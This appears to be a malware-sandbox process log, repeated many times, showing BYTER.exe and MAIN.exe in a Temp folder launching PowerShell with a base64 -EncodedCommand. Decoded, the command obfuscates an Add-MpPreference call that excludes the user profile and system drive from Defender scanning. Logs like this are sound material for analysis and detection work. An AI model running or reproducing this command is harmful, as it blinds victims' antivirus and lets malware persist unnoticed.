"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

